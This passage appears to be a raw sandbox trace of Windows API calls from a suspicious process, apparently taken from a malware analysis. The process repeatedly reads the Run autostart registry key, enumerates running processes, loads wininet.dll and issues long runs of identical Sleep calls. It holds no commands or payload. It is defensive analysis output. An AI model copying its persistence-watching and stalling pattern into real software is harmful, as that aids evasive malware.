[0185.266] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0185.267] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0185.267] NtClose (Handle=0x274) returned 0x0 [0185.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0185.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0185.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0185.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0185.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0185.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0185.283] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0185.284] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0185.284] NtClose (Handle=0x274) returned 0x0 [0185.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0185.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0185.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0185.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0185.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0185.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.486] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) Thread: id = 55 os_tid = 0x868 Thread: id = 56 os_tid = 0xe74 Thread: id = 62 os_tid = 0x820 [0123.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xedff58*=0x0, ZeroBits=0x0, RegionSize=0xedff5c*=0x2cc4c, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xedff58*=0xee0000, RegionSize=0xedff5c*=0x2d000) returned 0x0 [0123.878] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="wininet.dll", BaseAddress=0xedff44 | out: BaseAddress=0xedff44*=0x701a0000) returned 0x0 [0123.895] Sleep (dwMilliseconds=0x7d0) [0125.916] Sleep (dwMilliseconds=0x7d0) [0127.919] Sleep (dwMilliseconds=0x7d0) [0129.983] Sleep (dwMilliseconds=0x7d0) [0132.003] Sleep (dwMilliseconds=0x7d0) [0134.078] Sleep (dwMilliseconds=0x7d0) [0136.091] Sleep (dwMilliseconds=0x7d0) [0138.112] Sleep (dwMilliseconds=0x7d0) [0140.126] Sleep (dwMilliseconds=0x7d0) [0142.233] Sleep (dwMilliseconds=0x7d0) [0144.302] Sleep (dwMilliseconds=0x7d0) [0144.420] Sleep (dwMilliseconds=0x7d0) [0144.426] Sleep (dwMilliseconds=0x7d0) [0144.513] Sleep (dwMilliseconds=0x7d0) [0144.695] Sleep (dwMilliseconds=0x7d0) [0144.746] Sleep (dwMilliseconds=0x7d0) [0144.759] Sleep (dwMilliseconds=0x7d0) [0144.789] Sleep (dwMilliseconds=0x7d0) [0144.814] Sleep (dwMilliseconds=0x7d0) [0144.906] Sleep (dwMilliseconds=0x7d0) [0145.007] Sleep (dwMilliseconds=0x7d0) [0145.078] Sleep (dwMilliseconds=0x7d0) [0145.088] Sleep (dwMilliseconds=0x7d0) [0145.097] Sleep (dwMilliseconds=0x7d0) [0145.107] Sleep (dwMilliseconds=0x7d0) [0145.110] Sleep (dwMilliseconds=0x7d0) [0145.121] Sleep (dwMilliseconds=0x7d0) [0145.143] Sleep (dwMilliseconds=0x7d0) [0145.159] Sleep (dwMilliseconds=0x7d0) [0145.169] Sleep (dwMilliseconds=0x7d0) [0145.179] Sleep (dwMilliseconds=0x7d0) [0145.340] Sleep (dwMilliseconds=0x7d0) [0145.454] Sleep (dwMilliseconds=0x7d0) [0145.504] Sleep (dwMilliseconds=0x7d0) [0145.508] Sleep (dwMilliseconds=0x7d0) [0145.520] Sleep (dwMilliseconds=0x7d0) [0145.540] Sleep (dwMilliseconds=0x7d0) [0145.568] Sleep (dwMilliseconds=0x7d0) [0145.605] Sleep (dwMilliseconds=0x7d0) [0145.623] Sleep (dwMilliseconds=0x7d0) [0145.635] Sleep (dwMilliseconds=0x7d0) [0145.645] Sleep (dwMilliseconds=0x7d0) [0145.648] Sleep (dwMilliseconds=0x7d0) [0145.665] Sleep (dwMilliseconds=0x7d0) [0145.673] Sleep (dwMilliseconds=0x7d0) [0145.781] Sleep (dwMilliseconds=0x7d0) [0145.902] Sleep (dwMilliseconds=0x7d0) [0145.914] Sleep (dwMilliseconds=0x7d0) [0145.924] Sleep (dwMilliseconds=0x7d0) [0145.931] Sleep (dwMilliseconds=0x7d0) [0145.944] Sleep (dwMilliseconds=0x7d0) [0145.947] Sleep (dwMilliseconds=0x7d0) [0145.960] Sleep (dwMilliseconds=0x7d0) [0145.971] Sleep (dwMilliseconds=0x7d0) [0145.983] Sleep (dwMilliseconds=0x7d0) [0145.993] Sleep (dwMilliseconds=0x7d0) [0146.012] Sleep (dwMilliseconds=0x7d0) [0146.025] Sleep (dwMilliseconds=0x7d0) [0146.037] Sleep (dwMilliseconds=0x7d0) [0146.047] Sleep (dwMilliseconds=0x7d0) [0146.055] Sleep (dwMilliseconds=0x7d0) [0146.061] Sleep (dwMilliseconds=0x7d0) [0146.101] Sleep (dwMilliseconds=0x7d0) [0146.192] Sleep (dwMilliseconds=0x7d0) [0146.269] Sleep (dwMilliseconds=0x7d0) [0146.278] Sleep (dwMilliseconds=0x7d0) [0146.287] Sleep (dwMilliseconds=0x7d0) [0146.292] Sleep (dwMilliseconds=0x7d0) [0146.303] Sleep (dwMilliseconds=0x7d0) [0146.317] Sleep (dwMilliseconds=0x7d0) [0146.330] Sleep (dwMilliseconds=0x7d0) [0146.343] Sleep (dwMilliseconds=0x7d0) [0146.426] Sleep (dwMilliseconds=0x7d0) [0146.539] Sleep (dwMilliseconds=0x7d0) [0146.600] Sleep (dwMilliseconds=0x7d0) [0146.648] Sleep (dwMilliseconds=0x7d0) [0146.659] Sleep (dwMilliseconds=0x7d0) [0146.668] Sleep (dwMilliseconds=0x7d0) [0146.685] Sleep (dwMilliseconds=0x7d0) [0146.694] Sleep (dwMilliseconds=0x7d0) [0146.706] Sleep (dwMilliseconds=0x7d0) [0146.709] Sleep (dwMilliseconds=0x7d0) [0146.720] Sleep (dwMilliseconds=0x7d0) [0146.741] Sleep (dwMilliseconds=0x7d0) [0146.744] Sleep (dwMilliseconds=0x7d0) [0146.894] Sleep (dwMilliseconds=0x7d0) [0146.900] Sleep (dwMilliseconds=0x7d0) [0146.915] Sleep (dwMilliseconds=0x7d0) [0146.925] Sleep (dwMilliseconds=0x7d0) [0146.940] Sleep (dwMilliseconds=0x7d0) [0146.949] Sleep (dwMilliseconds=0x7d0) [0146.986] Sleep (dwMilliseconds=0x7d0) [0146.989] Sleep (dwMilliseconds=0x7d0) [0147.000] Sleep (dwMilliseconds=0x7d0) [0147.143] Sleep (dwMilliseconds=0x7d0) [0147.243] Sleep (dwMilliseconds=0x7d0) [0147.254] Sleep (dwMilliseconds=0x7d0) [0147.264] Sleep (dwMilliseconds=0x7d0) [0147.275] Sleep (dwMilliseconds=0x7d0) [0147.279] Sleep (dwMilliseconds=0x7d0) [0147.298] Sleep (dwMilliseconds=0x7d0) [0147.332] Sleep (dwMilliseconds=0x7d0) [0147.453] Sleep (dwMilliseconds=0x7d0) [0147.539] Sleep (dwMilliseconds=0x7d0) [0147.611] Sleep (dwMilliseconds=0x7d0) [0147.622] Sleep (dwMilliseconds=0x7d0) [0147.631] Sleep (dwMilliseconds=0x7d0) [0147.642] Sleep (dwMilliseconds=0x7d0) [0147.655] Sleep (dwMilliseconds=0x7d0) [0147.667] Sleep (dwMilliseconds=0x7d0) [0147.681] Sleep (dwMilliseconds=0x7d0) [0147.694] Sleep (dwMilliseconds=0x7d0) [0147.713] Sleep (dwMilliseconds=0x7d0) [0147.722] Sleep (dwMilliseconds=0x7d0) [0148.025] Sleep (dwMilliseconds=0x7d0) [0148.073] Sleep (dwMilliseconds=0x7d0) [0148.120] Sleep (dwMilliseconds=0x7d0) [0148.131] Sleep (dwMilliseconds=0x7d0) [0148.157] Sleep (dwMilliseconds=0x7d0) [0148.171] Sleep (dwMilliseconds=0x7d0) [0148.183] Sleep (dwMilliseconds=0x7d0) [0148.198] Sleep (dwMilliseconds=0x7d0) [0148.200] Sleep (dwMilliseconds=0x7d0) [0148.240] Sleep (dwMilliseconds=0x7d0) [0148.255] Sleep (dwMilliseconds=0x7d0) [0148.273] Sleep (dwMilliseconds=0x7d0) [0148.282] Sleep (dwMilliseconds=0x7d0) [0148.292] Sleep (dwMilliseconds=0x7d0) [0148.317] Sleep (dwMilliseconds=0x7d0) [0148.328] Sleep (dwMilliseconds=0x7d0) [0148.335] Sleep (dwMilliseconds=0x7d0) [0148.341] Sleep (dwMilliseconds=0x7d0) [0148.508] Sleep (dwMilliseconds=0x7d0) [0148.651] Sleep (dwMilliseconds=0x7d0) [0148.713] Sleep (dwMilliseconds=0x7d0) [0148.811] Sleep (dwMilliseconds=0x7d0) [0148.818] Sleep (dwMilliseconds=0x7d0) [0148.834] Sleep (dwMilliseconds=0x7d0) [0148.843] Sleep (dwMilliseconds=0x7d0) [0148.855] Sleep (dwMilliseconds=0x7d0) [0148.866] Sleep (dwMilliseconds=0x7d0) [0148.881] Sleep (dwMilliseconds=0x7d0) [0148.887] Sleep (dwMilliseconds=0x7d0) [0148.894] Sleep (dwMilliseconds=0x7d0) [0148.903] Sleep (dwMilliseconds=0x7d0) [0148.911] Sleep (dwMilliseconds=0x7d0) [0148.920] Sleep (dwMilliseconds=0x7d0) [0148.929] Sleep (dwMilliseconds=0x7d0) [0148.940] Sleep (dwMilliseconds=0x7d0) [0148.945] Sleep (dwMilliseconds=0x7d0) [0148.952] Sleep (dwMilliseconds=0x7d0) [0148.960] Sleep (dwMilliseconds=0x7d0) [0148.970] Sleep (dwMilliseconds=0x7d0) [0149.062] Sleep (dwMilliseconds=0x7d0) [0149.217] Sleep (dwMilliseconds=0x7d0) [0149.260] Sleep (dwMilliseconds=0x7d0) [0149.268] Sleep (dwMilliseconds=0x7d0) [0149.279] Sleep (dwMilliseconds=0x7d0) [0149.291] Sleep (dwMilliseconds=0x7d0) [0149.305] Sleep (dwMilliseconds=0x7d0) [0149.326] Sleep (dwMilliseconds=0x7d0) [0149.334] Sleep (dwMilliseconds=0x7d0) [0149.340] Sleep (dwMilliseconds=0x7d0) [0149.349] Sleep (dwMilliseconds=0x7d0) [0149.357] Sleep (dwMilliseconds=0x7d0) [0149.371] Sleep (dwMilliseconds=0x7d0) [0149.385] Sleep (dwMilliseconds=0x7d0) [0149.387] Sleep (dwMilliseconds=0x7d0) [0149.397] Sleep (dwMilliseconds=0x7d0) [0149.403] Sleep (dwMilliseconds=0x7d0) [0149.411] Sleep (dwMilliseconds=0x7d0) [0149.421] Sleep (dwMilliseconds=0x7d0) [0149.431] Sleep (dwMilliseconds=0x7d0) [0149.560] Sleep (dwMilliseconds=0x7d0) [0149.653] Sleep (dwMilliseconds=0x7d0) [0149.709] Sleep (dwMilliseconds=0x7d0) [0149.727] Sleep (dwMilliseconds=0x7d0) [0149.752] Sleep (dwMilliseconds=0x7d0) [0149.761] Sleep (dwMilliseconds=0x7d0) [0149.772] Sleep (dwMilliseconds=0x7d0) [0149.880] Sleep (dwMilliseconds=0x7d0) [0150.070] Sleep (dwMilliseconds=0x7d0) [0150.128] Sleep (dwMilliseconds=0x7d0) [0150.170] Sleep (dwMilliseconds=0x7d0) [0150.179] Sleep (dwMilliseconds=0x7d0) [0150.192] Sleep (dwMilliseconds=0x7d0) [0150.217] Sleep (dwMilliseconds=0x7d0) [0150.224] Sleep (dwMilliseconds=0x7d0) [0150.230] Sleep (dwMilliseconds=0x7d0) [0150.242] Sleep (dwMilliseconds=0x7d0) [0150.253] Sleep (dwMilliseconds=0x7d0) [0150.261] Sleep (dwMilliseconds=0x7d0) [0150.270] Sleep (dwMilliseconds=0x7d0) [0150.278] Sleep (dwMilliseconds=0x7d0) [0150.286] Sleep (dwMilliseconds=0x7d0) [0150.307] Sleep (dwMilliseconds=0x7d0) [0150.321] Sleep (dwMilliseconds=0x7d0) [0150.332] Sleep (dwMilliseconds=0x7d0) [0150.414] Sleep (dwMilliseconds=0x7d0) [0150.505] Sleep (dwMilliseconds=0x7d0) [0150.554] Sleep (dwMilliseconds=0x7d0) [0150.567] Sleep (dwMilliseconds=0x7d0) [0150.583] Sleep (dwMilliseconds=0x7d0) [0150.594] Sleep (dwMilliseconds=0x7d0) [0150.598] Sleep (dwMilliseconds=0x7d0) [0150.612] Sleep (dwMilliseconds=0x7d0) [0150.616] Sleep (dwMilliseconds=0x7d0) [0150.627] Sleep (dwMilliseconds=0x7d0) [0150.636] Sleep (dwMilliseconds=0x7d0) [0150.647] Sleep (dwMilliseconds=0x7d0) [0150.657] Sleep (dwMilliseconds=0x7d0) [0150.673] Sleep (dwMilliseconds=0x7d0) [0150.776] Sleep (dwMilliseconds=0x7d0) [0150.866] Sleep (dwMilliseconds=0x7d0) [0150.899] Sleep (dwMilliseconds=0x7d0) [0150.907] Sleep (dwMilliseconds=0x7d0) [0150.915] Sleep (dwMilliseconds=0x7d0) [0150.931] Sleep (dwMilliseconds=0x7d0) [0150.937] Sleep (dwMilliseconds=0x7d0) [0150.945] Sleep (dwMilliseconds=0x7d0) [0150.965] Sleep (dwMilliseconds=0x7d0) [0150.967] Sleep (dwMilliseconds=0x7d0) [0151.078] Sleep (dwMilliseconds=0x7d0) [0151.233] Sleep (dwMilliseconds=0x7d0) [0151.281] Sleep (dwMilliseconds=0x7d0) [0151.287] Sleep (dwMilliseconds=0x7d0) [0151.295] Sleep (dwMilliseconds=0x7d0) [0151.309] Sleep (dwMilliseconds=0x7d0) [0151.319] Sleep (dwMilliseconds=0x7d0) [0151.328] Sleep (dwMilliseconds=0x7d0) [0151.331] Sleep (dwMilliseconds=0x7d0) [0151.337] Sleep (dwMilliseconds=0x7d0) [0151.355] Sleep (dwMilliseconds=0x7d0) [0151.362] Sleep (dwMilliseconds=0x7d0) [0151.384] Sleep (dwMilliseconds=0x7d0) [0151.392] Sleep (dwMilliseconds=0x7d0) [0151.489] Sleep (dwMilliseconds=0x7d0) [0151.538] Sleep (dwMilliseconds=0x7d0) [0151.549] Sleep (dwMilliseconds=0x7d0) [0151.557] Sleep (dwMilliseconds=0x7d0) [0151.587] Sleep (dwMilliseconds=0x7d0) [0151.594] Sleep (dwMilliseconds=0x7d0) [0151.606] Sleep (dwMilliseconds=0x7d0) [0151.621] Sleep (dwMilliseconds=0x7d0) [0151.698] Sleep (dwMilliseconds=0x7d0) [0151.772] Sleep (dwMilliseconds=0x7d0) [0151.783] Sleep (dwMilliseconds=0x7d0) [0151.788] Sleep (dwMilliseconds=0x7d0) [0151.811] Sleep (dwMilliseconds=0x7d0) [0151.820] Sleep (dwMilliseconds=0x7d0) [0151.830] Sleep (dwMilliseconds=0x7d0) [0151.839] Sleep (dwMilliseconds=0x7d0) [0151.849] Sleep (dwMilliseconds=0x7d0) [0151.859] Sleep (dwMilliseconds=0x7d0) [0151.868] Sleep (dwMilliseconds=0x7d0) [0151.876] Sleep (dwMilliseconds=0x7d0) [0151.886] Sleep (dwMilliseconds=0x7d0) [0151.896] Sleep (dwMilliseconds=0x7d0) [0151.919] Sleep (dwMilliseconds=0x7d0) [0152.025] Sleep (dwMilliseconds=0x7d0) [0152.065] Sleep (dwMilliseconds=0x7d0) [0152.077] Sleep (dwMilliseconds=0x7d0) [0152.094] Sleep (dwMilliseconds=0x7d0) [0152.098] Sleep (dwMilliseconds=0x7d0) [0152.113] Sleep (dwMilliseconds=0x7d0) [0152.124] Sleep (dwMilliseconds=0x7d0) [0152.157] Sleep (dwMilliseconds=0x7d0) [0152.163] Sleep (dwMilliseconds=0x7d0) [0152.168] Sleep (dwMilliseconds=0x7d0) [0152.296] Sleep (dwMilliseconds=0x7d0) [0152.390] Sleep (dwMilliseconds=0x7d0) [0152.433] Sleep (dwMilliseconds=0x7d0) [0152.442] Sleep (dwMilliseconds=0x7d0) [0152.457] Sleep (dwMilliseconds=0x7d0) [0152.460] Sleep (dwMilliseconds=0x7d0) [0152.478] Sleep (dwMilliseconds=0x7d0) [0152.495] Sleep (dwMilliseconds=0x7d0) [0152.531] Sleep (dwMilliseconds=0x7d0) [0152.540] Sleep (dwMilliseconds=0x7d0) [0152.817] Sleep (dwMilliseconds=0x7d0) [0152.826] Sleep (dwMilliseconds=0x7d0) [0152.843] Sleep (dwMilliseconds=0x7d0) [0152.853] Sleep (dwMilliseconds=0x7d0) [0152.859] Sleep (dwMilliseconds=0x7d0) [0152.865] Sleep (dwMilliseconds=0x7d0) [0152.872] Sleep (dwMilliseconds=0x7d0) [0152.878] Sleep (dwMilliseconds=0x7d0) [0152.886] Sleep (dwMilliseconds=0x7d0) [0152.896] Sleep (dwMilliseconds=0x7d0) [0152.907] Sleep (dwMilliseconds=0x7d0) [0152.914] Sleep (dwMilliseconds=0x7d0) [0152.924] Sleep (dwMilliseconds=0x7d0) [0152.945] Sleep (dwMilliseconds=0x7d0) [0153.071] Sleep (dwMilliseconds=0x7d0) [0153.100] Sleep (dwMilliseconds=0x7d0) [0153.109] Sleep (dwMilliseconds=0x7d0) [0153.119] Sleep (dwMilliseconds=0x7d0) [0153.134] Sleep (dwMilliseconds=0x7d0) [0153.143] Sleep (dwMilliseconds=0x7d0) [0153.148] Sleep (dwMilliseconds=0x7d0) [0153.158] Sleep (dwMilliseconds=0x7d0) [0153.288] Sleep (dwMilliseconds=0x7d0) [0153.338] Sleep (dwMilliseconds=0x7d0) [0153.349] Sleep (dwMilliseconds=0x7d0) [0153.361] Sleep (dwMilliseconds=0x7d0) [0153.382] Sleep (dwMilliseconds=0x7d0) [0153.404] Sleep (dwMilliseconds=0x7d0) [0153.414] Sleep (dwMilliseconds=0x7d0) [0153.417] Sleep (dwMilliseconds=0x7d0) [0153.424] Sleep (dwMilliseconds=0x7d0) [0153.431] Sleep (dwMilliseconds=0x7d0) [0153.439] Sleep (dwMilliseconds=0x7d0) [0153.445] Sleep (dwMilliseconds=0x7d0) [0153.497] Sleep (dwMilliseconds=0x7d0) [0153.581] Sleep (dwMilliseconds=0x7d0) [0153.747] Sleep (dwMilliseconds=0x7d0) [0153.805] Sleep (dwMilliseconds=0x7d0) [0153.846] Sleep (dwMilliseconds=0x7d0) [0153.861] Sleep (dwMilliseconds=0x7d0) [0153.872] Sleep (dwMilliseconds=0x7d0) [0153.878] Sleep (dwMilliseconds=0x7d0) [0153.885] Sleep (dwMilliseconds=0x7d0) [0153.892] Sleep (dwMilliseconds=0x7d0) [0153.971] Sleep (dwMilliseconds=0x7d0) [0154.035] Sleep (dwMilliseconds=0x7d0) [0154.070] Sleep (dwMilliseconds=0x7d0) [0154.082] Sleep (dwMilliseconds=0x7d0) [0154.093] Sleep (dwMilliseconds=0x7d0) [0154.104] Sleep (dwMilliseconds=0x7d0) [0154.260] Sleep (dwMilliseconds=0x7d0) [0154.378] Sleep (dwMilliseconds=0x7d0) [0154.389] Sleep (dwMilliseconds=0x7d0) [0154.396] Sleep (dwMilliseconds=0x7d0) [0154.422] Sleep (dwMilliseconds=0x7d0) [0154.444] Sleep (dwMilliseconds=0x7d0) [0154.563] Sleep (dwMilliseconds=0x7d0) [0154.590] Sleep (dwMilliseconds=0x7d0) [0154.599] Sleep (dwMilliseconds=0x7d0) [0154.610] Sleep (dwMilliseconds=0x7d0) [0154.617] Sleep (dwMilliseconds=0x7d0) [0154.625] Sleep (dwMilliseconds=0x7d0) [0154.633] Sleep (dwMilliseconds=0x7d0) [0154.646] Sleep (dwMilliseconds=0x7d0) [0154.650] Sleep (dwMilliseconds=0x7d0) [0154.655] Sleep (dwMilliseconds=0x7d0) [0154.658] Sleep (dwMilliseconds=0x7d0) [0154.677] Sleep (dwMilliseconds=0x7d0) [0154.695] Sleep (dwMilliseconds=0x7d0) [0154.760] Sleep (dwMilliseconds=0x7d0) [0154.773] Sleep (dwMilliseconds=0x7d0) [0154.788] Sleep (dwMilliseconds=0x7d0) [0154.939] Sleep (dwMilliseconds=0x7d0) [0154.998] Sleep (dwMilliseconds=0x7d0) [0155.034] Sleep (dwMilliseconds=0x7d0) [0155.040] Sleep (dwMilliseconds=0x7d0) [0155.063] Sleep (dwMilliseconds=0x7d0) [0155.071] Sleep (dwMilliseconds=0x7d0) [0155.078] Sleep (dwMilliseconds=0x7d0) [0155.214] Sleep (dwMilliseconds=0x7d0) [0155.314] Sleep (dwMilliseconds=0x7d0) [0155.360] Sleep (dwMilliseconds=0x7d0) [0155.374] Sleep (dwMilliseconds=0x7d0) [0155.391] Sleep (dwMilliseconds=0x7d0) [0155.407] Sleep (dwMilliseconds=0x7d0) [0155.436] Sleep (dwMilliseconds=0x7d0) [0155.440] Sleep (dwMilliseconds=0x7d0) [0155.445] Sleep (dwMilliseconds=0x7d0) [0155.452] Sleep (dwMilliseconds=0x7d0) [0155.465] Sleep (dwMilliseconds=0x7d0) [0155.475] Sleep (dwMilliseconds=0x7d0) [0155.517] Sleep (dwMilliseconds=0x7d0) [0155.522] Sleep (dwMilliseconds=0x7d0) [0155.538] Sleep (dwMilliseconds=0x7d0) [0155.547] Sleep (dwMilliseconds=0x7d0) [0155.629] Sleep (dwMilliseconds=0x7d0) [0155.728] Sleep (dwMilliseconds=0x7d0) [0155.824] Sleep (dwMilliseconds=0x7d0) [0155.836] Sleep (dwMilliseconds=0x7d0) [0155.843] Sleep (dwMilliseconds=0x7d0) [0155.851] Sleep (dwMilliseconds=0x7d0) [0155.954] Sleep (dwMilliseconds=0x7d0) [0155.985] Sleep (dwMilliseconds=0x7d0) [0155.996] Sleep (dwMilliseconds=0x7d0) [0156.005] Sleep (dwMilliseconds=0x7d0) [0156.013] Sleep (dwMilliseconds=0x7d0) [0156.020] Sleep (dwMilliseconds=0x7d0) [0156.029] Sleep (dwMilliseconds=0x7d0) [0156.036] Sleep (dwMilliseconds=0x7d0) [0156.043] Sleep (dwMilliseconds=0x7d0) [0156.058] Sleep (dwMilliseconds=0x7d0) [0156.065] Sleep (dwMilliseconds=0x7d0) [0156.081] Sleep (dwMilliseconds=0x7d0) [0156.166] Sleep (dwMilliseconds=0x7d0) [0156.339] Sleep (dwMilliseconds=0x7d0) [0156.387] Sleep (dwMilliseconds=0x7d0) [0156.397] Sleep (dwMilliseconds=0x7d0) [0156.408] Sleep (dwMilliseconds=0x7d0) [0156.420] Sleep (dwMilliseconds=0x7d0) [0156.453] Sleep (dwMilliseconds=0x7d0) [0156.463] Sleep (dwMilliseconds=0x7d0) [0156.472] Sleep (dwMilliseconds=0x7d0) [0156.485] Sleep (dwMilliseconds=0x7d0) [0156.497] Sleep (dwMilliseconds=0x7d0) [0156.510] Sleep (dwMilliseconds=0x7d0) [0156.519] Sleep (dwMilliseconds=0x7d0) [0156.528] Sleep (dwMilliseconds=0x7d0) [0156.532] Sleep (dwMilliseconds=0x7d0) [0156.541] Sleep (dwMilliseconds=0x7d0) [0156.543] Sleep (dwMilliseconds=0x7d0) [0156.552] Sleep (dwMilliseconds=0x7d0) [0156.570] Sleep (dwMilliseconds=0x7d0) [0156.582] Sleep (dwMilliseconds=0x7d0) [0156.595] Sleep (dwMilliseconds=0x7d0) [0156.612] Sleep (dwMilliseconds=0x7d0) [0156.792] Sleep (dwMilliseconds=0x7d0) [0156.994] Sleep (dwMilliseconds=0x7d0) [0157.156] Sleep (dwMilliseconds=0x7d0) [0157.170] Sleep (dwMilliseconds=0x7d0) [0157.182] Sleep (dwMilliseconds=0x7d0) [0157.188] Sleep (dwMilliseconds=0x7d0) [0157.200] Sleep (dwMilliseconds=0x7d0) [0157.212] Sleep (dwMilliseconds=0x7d0) [0157.246] Sleep (dwMilliseconds=0x7d0) [0157.298] Sleep (dwMilliseconds=0x7d0) [0157.311] Sleep (dwMilliseconds=0x7d0) [0157.432] Sleep (dwMilliseconds=0x7d0) [0157.503] Sleep (dwMilliseconds=0x7d0) [0157.529] Sleep (dwMilliseconds=0x7d0) [0157.556] Sleep (dwMilliseconds=0x7d0) [0157.570] Sleep (dwMilliseconds=0x7d0) [0157.589] Sleep (dwMilliseconds=0x7d0) [0157.614] Sleep (dwMilliseconds=0x7d0) [0157.638] Sleep (dwMilliseconds=0x7d0) [0157.706] Sleep (dwMilliseconds=0x7d0) [0157.993] Sleep (dwMilliseconds=0x7d0) [0158.023] Sleep (dwMilliseconds=0x7d0) [0158.039] Sleep (dwMilliseconds=0x7d0) [0158.051] Sleep (dwMilliseconds=0x7d0) [0158.091] Sleep (dwMilliseconds=0x7d0) [0158.117] Sleep (dwMilliseconds=0x7d0) [0158.140] Sleep (dwMilliseconds=0x7d0) [0158.160] Sleep (dwMilliseconds=0x7d0) [0158.176] Sleep (dwMilliseconds=0x7d0) [0158.189] Sleep (dwMilliseconds=0x7d0) [0158.194] Sleep (dwMilliseconds=0x7d0) [0158.202] Sleep (dwMilliseconds=0x7d0) [0158.212] Sleep (dwMilliseconds=0x7d0) [0158.226] Sleep (dwMilliseconds=0x7d0) [0158.239] Sleep (dwMilliseconds=0x7d0) [0158.372] Sleep (dwMilliseconds=0x7d0) [0158.446] Sleep (dwMilliseconds=0x7d0) [0158.455] Sleep (dwMilliseconds=0x7d0) [0158.477] Sleep (dwMilliseconds=0x7d0) [0158.497] Sleep (dwMilliseconds=0x7d0) [0158.540] Sleep (dwMilliseconds=0x7d0) [0158.555] Sleep (dwMilliseconds=0x7d0) [0158.564] Sleep (dwMilliseconds=0x7d0) [0158.575] Sleep (dwMilliseconds=0x7d0) [0158.670] Sleep (dwMilliseconds=0x7d0) [0158.831] Sleep (dwMilliseconds=0x7d0) [0159.678] Sleep (dwMilliseconds=0x7d0) [0159.855] Sleep (dwMilliseconds=0x7d0) [0159.867] Sleep (dwMilliseconds=0x7d0) [0159.887] Sleep (dwMilliseconds=0x7d0) [0159.893] Sleep (dwMilliseconds=0x7d0) [0159.899] Sleep (dwMilliseconds=0x7d0) [0159.974] Sleep (dwMilliseconds=0x7d0) [0159.986] Sleep (dwMilliseconds=0x7d0) [0159.989] Sleep (dwMilliseconds=0x7d0) [0160.012] Sleep (dwMilliseconds=0x7d0) [0160.063] Sleep (dwMilliseconds=0x7d0) [0160.068] Sleep (dwMilliseconds=0x7d0) [0160.071] Sleep (dwMilliseconds=0x7d0) [0160.144] Sleep (dwMilliseconds=0x7d0) [0160.149] Sleep (dwMilliseconds=0x7d0) [0160.156] Sleep (dwMilliseconds=0x7d0) [0160.184] Sleep (dwMilliseconds=0x7d0) [0160.192] Sleep (dwMilliseconds=0x7d0) [0160.219] Sleep (dwMilliseconds=0x7d0) [0160.226] 